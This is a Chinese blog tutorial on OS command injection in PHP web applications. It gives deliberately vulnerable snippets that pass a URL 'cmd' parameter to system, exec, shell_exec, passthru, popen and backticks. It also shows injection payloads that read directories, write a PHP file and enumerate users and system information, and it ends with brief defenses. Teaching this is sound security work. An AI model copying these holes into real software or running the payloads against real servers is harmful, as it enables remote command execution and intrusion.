<web渗透-系统命令注入>

最新推荐文章于 2024-05-29 08:15:00 发布
最新推荐文章于 2024-05-29 08:15:00 发布
阅读量492 收藏
点赞数
分类专栏: web渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540964/article/details/110149465
版权

(1) .OS命令

类似于编程语言注入一样,一些应用程序需要去调用一些外部程序
应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令
的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行的漏洞

.危害
-继承WEB服务器程序权限,执行系统命令
-继承WEB服务器程序权限,读写文件
-反弹shell
-控制整个网站
-控制整个服务器
.存在原因
用户输入作为拼接
没有安全过滤

.相关函数

【1】 .system()
    将字符串作为OS命令进行执行
    自动输出

    system.php
    <meta charset='gb2312'>
    <?php
    	if(isset($_GET['cmd']))
    	{
    		system($_GET['cmd']);
    	}
    	else
    	{
    		echo "please input ?cmd=";
    	}
    ?>
 
   【2】.exec()
     将字符串作为OS命令进行执行
     手动输出
    exec.php  
    <meta charset='gb2312'>
    <?php
    	if(isset($_GET['cmd']))
    	{
    		print exec($_GET['cmd']);
    	}
    	else
    	{
    		echo "please input ?cmd=";
    	}
    ?>

   【3】.shell_exec()
     将字符串作为OS命令进行执行
     手动输出
     shell_exec.php  
    <meta charset='gb2312'>
    <?php
    	if(isset($_GET['cmd']))
    	{
    		print shell_exec($_GET['cmd']);
    	}
    	else
    	{
    		echo "please input ?cmd=";
    	}
    ?>

    【4】.passthru()
    将字符串作为OS命令进行执行
    自动输出
     passthru.php  
    <meta charset='gb2312'>
    <?php
    	if(isset($_GET['cmd']))
    	{
    	   passthru($_GET['cmd']);
    	}
    	else
    	{
    		echo "please input ?cmd=";
    	}
    ?>

    【5】.popen()
       同样执行命令返回结果
       返回一个文件指针

       popen.php  
    <meta charset='gb2312'>
    <?php
    	if(isset($_GET['cmd']))
    	{
    		popen($_GET['cmd']);
    	}
    	else
    	{
    		echo "please input ?cmd=";
    	}
    ?>
        '返回结果写入文件中进行查看'
        ?cmd=ipconfig >>1.txt

   【6】.反引号 ` `

     `.php  
    <meta charset='gb2312'>
    <?php
    	if(isset($_GET['cmd']))
    	{
    		print `{$_GET['cmd']}`;
    	}
    	else
    	{
    		echo "please input ?cmd=";
    	}
    ?>

     【7】.其他具体看不同编程语言
         .......

(2) .漏洞利用
*查看系统文件
system.php?cmd=type c:\windows\

*显当前路径
 ?cmd=cd

 *写文件
  ?cmd=echo "<?php phpinfo()?>" >D:\\
   页面没有报错执行成功

 *其他命令
  ?cmd=ipconfig
  ?cmd=whoami
  ?cmd=net user 
  ?cmd=systeminfo
  ..

(3) .防御方法
1.尽量减少执行函数的使用,并在
php.ini配置文件中
disable_functions=禁用函数名

   2.进入命令执行的函数或方法之前,对参数进行过滤

   3.参数的值尽量使用引号包裹
    并在凭借前调用addslashes进行转义
好先生·
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
5位可控字符下的任意命令执行 - 另一种解题方法
Ms08067安全实验室
11-25 1231
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀01前言题目是hitcon-ctf-2017的babyfirst-revenge,之前是针对babyfirst-revenge-v...
忍者安全渗透系统(NINJUTSU OS v3)系统安装以及中文包下载安装
热门推荐
qq_35258210的博客
04-06 3万+
将镜像下载好使用VM安装,我给该系统分配了70个G硬盘,6G内存 目录 系统安装 安装中文包 系统安装 1、进入系统安装后点击第二个选项选择chinese再点击下一步 输入密钥,因为没有密钥所以点箭头指向那个就行 2、同意并下一步 3、选择第二个 4、选择你要安装到哪个盘,选择好点击下一步 5、等待安装完毕 6、安装完毕后,开锁密码toor 桌面 安装中文包 1、win+R输入services.msc回车键 2、往下拉找到windows upda
部署mac os渗透测试环境
Delity的博客
08-05 7376
一、序言 每次重装系统后配置环境都是需要耗费大量时间,特此写一篇mac os部署渗透测试环境 二、过程 (一)系统设置 1.常用设置 ①SSD 开启 TRIM 支持 sudo trimforce enable ②APP安装开启任何来源 sudo spctl --master-disable ③修改主机名 sudo scutil --set HostName xxxxx ④安装 xcode 命...
常用渗透测试系统
Spontaneous_0的博客
03-17 333
常用渗透测试系统
命令注入攻击及其防范措施
最新发布
常备不懈
05-29 450
命令注入攻击是一种通过有漏洞的应用程序在主机操作系统上执行任意命令的攻击。 当应用程序将不安全的用户输入数据(如表单、cookie、HTTP 标头等)传递给系统命令执行时,可能会发生命令注入攻击。
忍者安全渗透系统(NINJITSU OS V3)的安装详细过程,亲测新旧vm版本都可安装,附带下载来源
02-14 1万+
忍者安全渗透系统(NINJITSU)的安装详细过程,亲测新旧vm版本都可安装,附带下载来源
web渗透系列教学下载共64份.zip
12-30
web渗透--27--命令注入.pdf web渗透--28--HTTP响应头拆分漏洞.pdf web渗透--29--LDAP注入.pdf web渗透--3--自动化漏洞扫描.pdf web渗透--30--ORM注入.pdf web渗透--31--Json劫持Json注入.pdf web渗透--32--宽字节...
WEB渗透学习-upload-labs靶场
04-20
总的来说,"upload-labs"靶场是Web渗透初学者和进阶者理想的练习平台,它能够系统性地提升你在文件上传漏洞方面的技能。无论你是想在网络安全领域发展,还是仅仅对这个话题感兴趣,投入时间在这个靶场上,都将是一次...
高级Web渗透测试工程师-Mysql注入教程.pdf
11-25
本资源为高级Web渗透测试工程师的Mysql注入教程,涵盖了Mysql的基础知识、安装、操作命令、函数、PHP mysqli链接、数据库结构对比、Mysql注入原理、读取和写入的妙用、后台手工注入及绕过、PHP的魔术引号与宽字节...
Web渗透测试-常见漏洞解析课件
03-23
Web渗透测试是网络安全领域的重要部分,它涉及到对Web应用程序的安全性进行系统性的检查,以发现潜在的漏洞并防止黑客攻击。本课件“Web渗透测试-常见漏洞解析”旨在深入探讨这一主题,帮助学习者理解和掌握如何有效...
DC-4-Web渗透测试靶机
01-19
例如,SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入等,都是常见的Web应用漏洞。 4. **漏洞利用**:利用已知的攻击手段或编写自定义exploit,尝试对目标系统进行攻击。例如,通过SQL注入获取数据库信息,或...
ParrotSec-OS渗透测试系统
as125as的博客
12-30 3736
–>相关镜像,论坛 镜像下载 官方镜像下载 清华镜像下载 中科大镜像下载 测试版下载 论坛 官方论坛 国内论坛 电报群 官方TG群 国内TG群 Git库 官方Gitlab 官方Github 国内Github 国内小伙伴QQ群:群验证问题 微信公众号 相关linux /usr/local/share #相当于C:/Program Files /opt/ #相当于D...
Parrot OS 4.6渗透测试系统安装与基础环境搭建
Fly_鹏程万里
08-05 5217
Parrot OS简介 Parrot Security是对黑客和渗透测试人员非常友好的一个操作系统,Forensics Distro致力于黑客和网络安全专业人士。它有一个大型存储库,可以为新手和专家收集大量令人惊叹的黑客工具。由FrozenBox开发。第一个版本发布于2013年6月。它曾经使用MATE作为桌面环境,它基于像Kali Linux这样的Debian。 Parrot OS 4.6...
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
freeking101的博客
07-02 4885
基于 Windows、Linux、Android 的渗透测试系统
[经验分享] OSCP 渗透测试认证
weixin_34186931的博客
11-17 4731
http://f4l13n5n0w.github.io/blog/2015/05/05/jing-yan-fen-xiang-oscp-shen-tou-ce-shi-ren-zheng/   “120天的旅程即将结束,以一场历时24小时没有选择题的考试,收获屠龙路上第一座里程碑。…” 这是我通过OSCP认证考试时,第一时间的感受。自豪和欣喜之情不亚于2008年我拿下CCIE R&amp;S的...
网络安全入门必备:渗透常用命令速查手册
郊眠寺
06-20 759
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
命令注入漏洞
qq_44915227的博客
04-23 1353
命令注入攻击(即Command Injection)是web应用程序对用户的输入提交的数据过滤不严格,导致攻击者构造恶意的特殊命令字符串的方式将数据提交到web应用程序中,从而执行外部程序或系统命令来进行攻击,非法获取目标服务器的数据资源。继承Web服务器程序(web用户)权限,去执行系统命令继承Web服务器权限,读写文件反弹Shell控制整个网站控制整个服务器测试IP地址:8.8.8.8(返回ping的结果)自己本机地址也是一样的。
3.7 命令注入攻击
m0_56534254的博客
10-12 1345
概念:当Web应用程序解析XML输入时,如果没有禁止外部实体的使用,导致服务器可加载恶意外部文件和代码,就会产生外部实体注入漏洞,被攻击者利用发起网络攻击。根据实体种类的不同,XML解析器将使用实体的替代文本或者外部文档的内容来替代实体引用,由此引入了内部实体和外部实体的概念。的方式引用了通用实体,将这段xml提交服务器后,服务器就会执行系统命令id,并返回当前用户的身份标识信息。外部实体 调用外部文件所申明的实体,若实体有任何的修改,则直接在该文档中更新,无需修改引用处的脚本,使用方便。
linux渗透测试常用命令
程序员小麦的博客
06-24 918
渗透测试,linux是基础,刚开始学不需要大家一心专到linux里去,只要把渗透过程中常用的linux命令记住就行了,网上这种总结很多,给大家找了一篇总结的非常好的,前期记住这些就够用了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值